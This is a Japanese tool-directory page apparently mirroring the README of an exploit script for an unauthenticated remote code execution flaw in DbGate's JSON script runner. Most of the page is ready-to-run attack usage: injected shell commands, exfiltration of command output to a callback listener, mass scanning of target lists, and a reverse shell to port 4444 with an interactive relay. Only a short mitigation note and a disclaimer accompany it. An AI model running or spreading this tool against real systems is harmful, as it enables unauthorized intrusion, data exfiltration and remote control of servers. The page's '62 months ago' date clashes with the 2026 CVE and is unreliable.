Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-47668 — DbGate Unauthenticated Remote Code Execution | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-47668
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate Unauthenticated Remote Code Execution

リポジトリを見る
62ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-47668 — DbGate リモートコード実行

DbGate の JSON スクリプトランナー(dbgate-serve ≤ 7.1.8)における未認証 RCE。
評価ツール: CVE-2026-47668.py — 認可されたテストのみ。

CVECVE-2026-47668
深刻度Critical
製品DbGate / dbgate-serve
影響を受けるバージョン≤ 7.1.8
修正バージョン≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

脆弱性

タイトル: DbGate の JSON スクリプトランナーを介した未認証リモートコード実行

ユーザーが制御するフィールド(functionName、variableName)は、適切な検証なしに動的に生成される JavaScript に埋め込まれます。攻撃者は Node.js ランナーの子プロセスで任意のコードを実行できます。

緩和策: 7.1.9+ にアップグレードしてください。ネットワークアクセスを制限し、匿名認証を無効にし、認証情報をローテーションし、不審な /runners/start アクティビティがないかログを確認してください。


連絡先

Telegram: @KNxploited


ツール概要

CVE-2026-47668.py は、認可されたテスト対象の DbGate インスタンスに対する悪用のチェックと検証を行います。

モード

結果

出力ディレクトリ: Nx/(vuln、dispatch、exfil、failed、list_report、exfil/ 配下のターゲット別ファイル)


インストール

root@kitploit:~
pip install -r requirements.txt

必要条件: Python 3.9+、aiohttp、colorama


使用方法

AUTO ウィザード(デフォルト — リバースシェルなし)

root@kitploit:~
python CVE-2026-47668.py
プロンプトへの入力例
単一 URLhttp://192.168.1.10:3000
URL + コマンドhttp://192.168.1.10:3000|id
ターゲットリストtargets.txt

CLI — 有効化フラグ

CLI での実行には必ず --cli を含める必要があります。

root@kitploit:~
python CVE-2026-47668.py --cli [options]

単一ターゲット

-u / --url — ターゲットのベース URL

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — シェルコマンド(デフォルト: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — 脆弱性プローブのみ(コマンドなし)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — インジェクションベクター: functionName | variableName | both(両方)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — URL にポートが指定されていない場合のデフォルトポート(デフォルト: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — 既存の Bearer トークンを使用

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — カスタムログインボディ(デフォルト: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — HTTP タイムアウト(秒)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — TLS 証明書を検証

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

コールバック / エクスフィル(CLI で --cmd を使用する場合のデフォルト)

--callback-host — ターゲットがあなたのリスナーに到達するために使用する IP/ホスト名

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — HTTP リスナーのローカルバインドアドレス(デフォルト: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — HTTP エクスフィルポート(デフォルト: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — 外部コールバック URL(組み込みリスナーを無効化)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — コールバック待機秒数(単一ターゲット、デフォルト: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — base64 エンコードなしで出力を送信

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — execSync の代わりに非同期の exec を使用

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

マススキャン(リバースシェルなし)

-f / --file — ターゲットリストファイル

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — 同時実行ワーカー数(デフォルト: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — マススキャン時のターゲットごとのコールバック待機時間(デフォルト: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

マススキャン + カスタムデフォルトポート

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

リバースシェル(オプション — 単一ターゲットのみ)

通常のテストでは必須ではありません。証明には HTTP エクスフィル(--cmd)を使用してください。

--reverse-shell — ターゲットが LHOST:LPORT に接続(値を省略 = LAN IP + ポート 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — --reverse-shell に :port がない場合のポート

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — ローカルリッスンアドレス

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — TCP 接続待機時間(デフォルト: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — 接続後の基本的な stdin/stdout リレー

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Docker に関する注意: PC 上の 127.0.0.1 だけでなく、DbGate コンテナから到達可能な IP(例: ホストゲートウェイ)を使用してください。


ターゲットリスト(targets.txt)

root@kitploit:~
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • ポートなし → 3000 が自動的に適用されます
  • host|command → 行ごとのコマンド上書き
  • レポート: Nx/list_report.txt

出力ファイル


ワークフロー

  1. POST /auth/login → Bearer トークン(--token 指定時以外は自動)
  2. プローブ → ランナーがインジェクションを受け入れる
  3. POST /runners/start → コマンド実行 + HTTP コールバック(有効な場合はリバース TCP)
  4. 分類 → EXFIL = 確認済みの出力

免責事項

認可されたセキュリティテスト専用です。システムをテストするには明示的な許可が必要です。作者は、誤用または不正使用について一切の責任を負いません。


By: Nxploited

ツールをダウンロード
項目詳細
エンドポイントPOST /runners/start
認証Bearer が必要。匿名/デフォルト設定のデプロイでは POST /auth/login 経由でトークンを取得可能
インジェクションJSON assign コマンド内の functionName、variableName
影響DbGate プロセスのユーザーとしての OS コマンド実行
モードリバースシェル説明
AUTOなしプロンプト1回; トークン + HTTP コールバック + デフォルト値
CLI任意フラグによる完全制御
Massなしtargets.txt からスキャン
--reverse-shellありオプションの TCP 検証(単一ターゲットのみ)
結果意味
FAIL到達不能、認証失敗、または脆弱でない
VULNランナーがプローブのみ受け入れ
DISPATCHペイロード送信済み。確認済みの出力なし
EXFILコールバック受信 — コマンド出力を確認済み
REVSHリバース TCP 接続(オプションモードのみ)
ファイル内容
Nx/vuln.txt脆弱なターゲット(プローブ成功)
Nx/dispatch.txtペイロード送信済み、未確認
Nx/exfil.txt確認済みコールバック
Nx/failed.txt失敗したターゲット
Nx/exfil/<host>.txtターゲットごとのコマンド出力
Nx/sessions/<id>/summary.jsonセッションサマリー